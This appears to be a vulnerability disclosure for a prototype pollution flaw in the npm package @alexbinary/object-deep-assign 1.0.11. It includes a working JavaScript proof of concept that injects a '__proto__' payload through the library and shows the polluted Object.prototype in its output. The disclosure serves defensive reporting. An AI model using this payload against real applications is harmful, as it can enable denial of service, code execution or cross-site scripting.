@alexbinary/object-deep-assign npm package, version 1.0.11 has a potential prototype pollution. The vulnerability located at Module.deepAssign (/src/index.js:9)
. when extend()
method
used to recursively copy source property to the destination. Since there's no security checks in-place, an attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__
or constructor.prototype
.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
(async () => {
const lib = await import('@alexbinary/object-deep-assign');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
No updates were provided by the maintainer. Users of this module are urged to implement proper santization and validation over user's supplied inputs, such as blocking inputs containing __proto__
and contructor.prototype